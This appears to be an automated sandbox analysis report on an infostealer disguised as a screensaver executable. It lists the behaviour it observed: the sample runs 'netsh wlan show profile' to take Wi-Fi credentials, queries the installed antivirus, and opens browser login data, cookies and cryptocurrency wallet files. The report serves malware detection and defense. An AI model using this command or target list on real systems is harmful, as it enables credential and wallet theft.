Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE1C460 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00007FF73AE1C460
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE36370 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 0_2_00007FF73AE36370
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EC48CC GetModuleFileNameW,GetVersionExW,LoadLibraryW,LoadLibraryW, 68_2_00007FF7F7EC48CC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 00000002.00000002.2329026765.0000028C87B86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2322690660.0000028C87B63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2041945157.000001CCD86C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2324666281.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2041945157.000001CCD86C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2326023533.0000028C87B85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2320597036.0000028C88DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2323296128.0000028C87B76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 1788, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 5260, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\_MEI17882\rarreg.key, type: DROPPED
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Electrum
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxxz
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Exodusz
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Ethereum
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqlite
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqlite Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqlite Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqlite Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: Yara match File source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 5260, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000002.00000002.2329026765.0000028C87B86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2322690660.0000028C87B63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2041945157.000001CCD86C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2324666281.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2041945157.000001CCD86C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2326023533.0000028C87B85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2320597036.0000028C88DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2323296128.0000028C87B76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 1788, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 5260, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\_MEI17882\rarreg.key, type: DROPPED
Source: Yara match File source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 5260, type: MEMORYSTR